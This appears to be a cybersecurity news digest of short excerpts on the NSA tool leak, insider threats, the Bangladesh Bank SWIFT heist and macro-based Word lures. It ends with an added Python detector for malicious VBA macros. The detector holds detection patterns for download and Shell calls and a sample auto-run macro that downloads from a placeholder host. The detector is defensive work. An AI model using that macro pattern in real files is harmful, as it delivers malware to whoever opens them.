Transparency has its limits!
Some of the most powerful espionage tools created by the National Security Agency’s elite group of hackers have been revealed in recent days, a development that could pose severe consequences for the spy agency’s operations and the security of government and corporate computers.
“Without a doubt, they’re the keys to the kingdom,” said one former NSA employee, who spoke on the condition of anonymity to discuss sensitive internal operations. “The stuff you’re talking about would undermine the security of a lot of major government and corporate networks both here and abroad.”
Click here for the full article in the Washington Post.
Insider threats are behind the sharp increases over the past 18 months in the percentage of organizations that have experienced loss of company data. According to the Ponemon Institute, three out of every four organizations (76%) have been hit over the past two years—a significant increase from 67% in a 2014 study.
The findings show that the rise is due in large part to compromises in insider accounts—a phenomenon exacerbated by an increase in the proportion of employees who have unnecessary access to sensitive data. Respondents say insider negligence is more than twice as likely to cause the compromise of insider accounts as any other culprits.
More from InfoSecurity Magazine by clicking here.
Australia has set up a cyber-intelligence unit to identify terrorism financing, money laundering and financial fraud online, the government said on Tuesday, because of “unprecedented” threats to national security.
The measure expands on a major platform of conservative Prime Minister Malcolm Turnbull, who narrowly won re-election last month after promising to improve Australia’s cybersecurity and transform the economy into a tech-savvy business hub.
Justice Minister Michael Keenan said the new unit, set up under money-tracking agency the Australian Transaction Reports and Analysis Centre (AUSTRAC), would investigate online payment platforms and financial cybercrime to crack down on money-laundering and criminal networks.
“We know that the use of fraudulent identities continues to be a key enabler of serious and organized crime and terrorism,” Keenan said in a statement.
See the full article by clicking here.
Though the police here have released little information about Gavin Long, a deeper portrait is beginning to emerge, based on a large trail left online.
Many of these digital breadcrumbs — web posts, YouTube videos and podcasts — are tied to Mr. Long’s given name, or some version of a new name, Cosmo Ausar Setepenra, which he filed court documents in Missouri to adopt in May 2015.
There is evidence that he sought to do the right thing, pursuing higher education and serving his nation. There is also evidence of paranoid thinking, and an interest in shedding blood to advance the cause of oppressed peoples.
In an interview with a podcast host in March, Mr. Long identified himself as a member of the online community of so-called targeted individuals, people who believe they are being harassed with mind-control weapons and by armies of stalkers.
Read the whole article via The New York Times by clicking here.
Last year, CIO, CSO and PricewaterhouseCoopers released a new Global State of Information Security survey, which polled more than 10,000 executives from 127 countries about IT security. The results were a mixed bag, with security incidents up 38% over 2014 but corresponding budgets rising only 24%.
This finding reflects common corporate psychology that cybersecurity is a cost center and a drain on resources – a Cisco survey of over 1,000 executives also found that 74% of respondents in the U.S. said that the main purpose of cybersecurity is to reduce risk instead of enable growth. I’ve found that people tend to think of cybersecurity as costly, complex, inefficient, and a damper on productivity. Many people believe it may not actually work or mitigate risk. This can result in security measures being implemented piecemeal without any overarching policy, resulting in costly but poor integration.
See the whole article at Forbes.com by clicking here.
In a study published Thursday in the journal Science, Dr. Johnson and Miami colleagues searched for pro-Islamic State posts each day from mid-2014 until August 2015, mining mentions of beheadings and blood baths in multiple languages on Vkontakte, a Russia-based social media service that is the largest European equivalent to Facebook. Ultimately, they devised an equation that tries to explain the activity of Islamic State sympathizers online and might, they say, eventually help predict attacks that are about to happen.
Read the whole article from The New York Times here.
A water and electricity authority in the State of Michigan, Lansing’s Board of Water & Light, needed a week to recover from a ransomware attack that hit its enterprise systems recently.
The successful phishing attack on its corporate systems, which was first noticed on April 25, forced the utility to keep systems, including phone servers, locked down since then.
More on this story is available from Smart Grid News by clicking here.
Investigators suspect that malicious software code allowing hackers to withdraw the money could have been installed several weeks before the incident. Malware gave hackers an inside look at the bank’s systems.
The hackers appeared to have stolen Bangladesh Bank’s credentials for the SWIFT messaging system, which banks around the world use for secure financial communication.
Investigators believe the attack was sophisticated, describing the use of a “zero day” and referring to an “advanced persistent threat.”
More from Fortune magazine by clicking here.
Experian’s just released third annual Data Breach Industry Forecast report for 2016 predicts that big hacks will continue to grab the headlines, but small breaches will cause “a lot more damage.”
“Whether it’s a true malicious insider, or just employee negligence, 80 percent of the breaches we’ve worked so far in 2015 have been [caused by] employees … and I don’t think that’s going to change in the healthcare field and other fields,” says Michael Bruemmer of Experian Data Breach Resolution.
“One popular social engineering trick to entice users to enable macros, is to make the user believe that the document contains secret or confidential information, and that the user needs to take action to reveal this information,” Didier Stevens explained.
The Word document will contain a message that the content is hidden (or encoded, or encrypted, …) and that the user needs to enable the content (or the macros) to visualize it. This function will change the font color from white to black (thereby “revealing” the hidden information) and remove the header that instructs the user to enable the content.
Effectively, this function will make you believe that nothing out of the ordinary happened, and that your action simply allowed you to read the document. What you won’t know or notice is that a malicious payload is downloaded and executed in the background, and your computer has been compromised.
More from HelpNetSecurity by clicking here.
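As an added illustration of the lure described in the HelpNetSecurity excerpt above (not code from that article or from Didier Stevens), this Python sketch triages already-extracted VBA macro source for the combination the excerpt describes: an auto-run entry point, "reveal" formatting changes, banner removal, and a download or execution call. The indicator patterns, verdict names and both sample macros are assumptions constructed for this example.

```python
import re
# Indicator groups: assumptions chosen for this example, not a complete rule set.
INDICATORS = {
    "auto_exec": re.compile(r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I),
    "reveal_text": re.compile(r"\.Font\.(Color|ColorIndex|Hidden)\s*=", re.I),
    "remove_banner": re.compile(r"\.(Headers|Shapes)\b.*\.Delete\b", re.I),
    "fetch_or_run": re.compile(r"\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|Shell)\b", re.I),
}

def strip_comment(line):
    """Drop a trailing VBA comment ('...) unless the quote is inside a string."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def triage(source):
    """Return (verdict, hits) where hits maps indicator name -> line numbers."""
    hits = {name: [] for name in INDICATORS}
    for lineno, line in enumerate(source.splitlines(), start=1):
        code = strip_comment(line)
        for name, pattern in INDICATORS.items():
            if pattern.search(code):
                hits[name].append(lineno)
    lure = bool(hits["reveal_text"] or hits["remove_banner"])
    payload = bool(hits["auto_exec"] and hits["fetch_or_run"])
    if payload:
        verdict = "lure-with-payload" if lure else "auto-exec-payload"
    else:
        verdict = "low" if any(hits.values()) else "none"
    return verdict, hits
# Constructed samples (not taken from any real document).
LURE_SAMPLE = '''
Sub Document_Open()
    ' "reveal" the text the banner claimed was protected
    ActiveDocument.Content.Font.Color = wdColorBlack
    ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Delete
    URLDownloadToFile 0, "https://example.invalid/placeholder", tmpPath, 0, 0
End Sub
'''
BENIGN_SAMPLE = '''
Sub HighlightHeadings()
    ' formatting helper; does not call Shell or download anything
    Selection.Font.Color = wdColorBlue
End Sub
'''
```

The benign sample shows why the formatting indicators alone only rate "low": font changes are ordinary macro behaviour, and it is their pairing with an auto-run entry point and a fetch or execution call that matches the lure.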